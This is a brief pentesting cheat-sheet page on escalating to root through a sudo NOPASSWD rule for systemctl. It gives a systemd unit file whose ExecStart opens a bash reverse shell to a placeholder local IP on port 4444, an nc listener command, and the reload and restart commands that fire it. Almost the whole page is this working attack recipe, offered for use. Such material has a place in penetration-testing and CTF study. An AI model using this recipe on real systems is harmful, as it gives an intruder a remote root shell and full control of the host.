Sudo Systemctl Privilege Escalation
Last modified: 2023-02-05
sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.
sudo -l (ALL) NOPASSWD: systemctl
If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.
1. Update the Config File
We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.
[Unit] This is an example service. [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1' [Install] WantedBy=multi-user.target
Replace “<local-ip>” with your local ip address.
2. Start Listener in Local Machine
Then start listener for getting a root shell.
nc -lvnp 4444
3. Restart the Service
Reload the daemon and restart.
sudo systemctl daemon-reload sudo systemctl restart example.service
Now we should get a shell in local machine.